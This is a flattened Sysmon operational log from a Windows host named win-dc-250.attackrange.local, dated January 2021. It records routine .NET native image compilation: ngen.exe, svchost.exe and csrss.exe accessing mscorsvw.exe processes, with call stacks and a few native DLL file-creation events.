13:25:41.697{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-ED03-000000009A01}2332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.618{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-EC03-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.603{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4655-6000-EC03-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.603{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-EC03-000000009A01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:41.556{08A6967A-4655-6000-EB03-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ab0-0\Microsoft.VisualC.dll2021-01-14 13:25:41.556 10341000x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.525{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-EB03-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.509{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4655-6000-EB03-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.509{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-EB03-000000009A01}2736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.478{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-EA03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.462{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4655-6000-EA03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.462{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-EA03-000000009A01}4464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:41.400{08A6967A-4655-6000-E903-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b8c-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-14 13:25:41.400 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-E903-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.087{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4655-6000-E903-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.087{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-E903-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:41.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4655-6000-E803-000000009A01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:40.993{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4655-6000-E803-000000009A01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:40.993{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4655-6000-E803-000000009A01}4600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.868{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-FA03-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.853{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4656-6000-FA03-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.853{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-FA03-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.603{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4656-6000-F903-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.587{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4656-6000-F903-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:42.587{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4656-6000-F903-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 